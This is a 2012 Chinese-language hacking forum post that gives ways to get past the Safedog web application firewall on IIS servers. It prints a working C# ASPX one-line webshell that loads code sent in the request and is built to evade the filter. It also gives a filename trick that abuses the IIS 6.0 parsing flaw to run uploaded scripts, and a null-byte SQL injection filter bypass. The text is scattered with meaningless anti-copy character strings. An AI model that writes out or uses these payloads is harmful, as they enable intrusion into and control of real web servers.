找回密码
 立即注册
查看: 2487|回复: 0
打印 上一主题 下一主题

突破安全狗防注入及上传的一些思路

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-31 08:25:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、绕过IIS安全狗的一句话。# _6 z- s. ^; P) v$ P6 c
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
) W& f* \8 C- k2 C! k, \<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
$ X. H: O8 e+ Z3 y) R; N
: f# S2 G: ]0 c8 k, e9 O/ ~( E2、IIS6.0解析漏洞遇到安全狗。
. u  R, @) E$ R9 l6 K文件名为
$ Z+ h: D5 ]4 ~* I( ~http://www.xxxxx.com/sh3llc0de.asp;1.jpg
1 k  b" c9 v! |2 l+ t& m, P% a7 w, {; V3 k
这样的会被IIS安全狗果断屏蔽。6 q$ E! {) Y) j' Y/ n
改成如下名称,IIS6一样会解析:
" l7 K1 d+ M5 f- k  u) Q+ ewww.xxxxx.com/;1.asp;1.jpg
2 N% s9 h; ]6 n: T) B' X
+ N  z% n( K6 F6 t3、安全狗的注入绕过。4 N4 m8 B9 e7 J1 @4 ^& g
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
; S1 o8 @) R* K& Q, i* }+ O# ]但如果:
# T5 M! q9 T5 {. f5 ^9 P9 E  cr00ts.asp?r00ts.com=%00.&id=69%20 and 1=1: P0 f" ]" X* z! X
就可以成功绕过了。
4 ^0 A7 [3 t) h% H" c1 g: [) T  t3 N
. D! g/ k3 t' k) R$ A
1 h- P# y+ |! O: P( r* Z, }8 x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表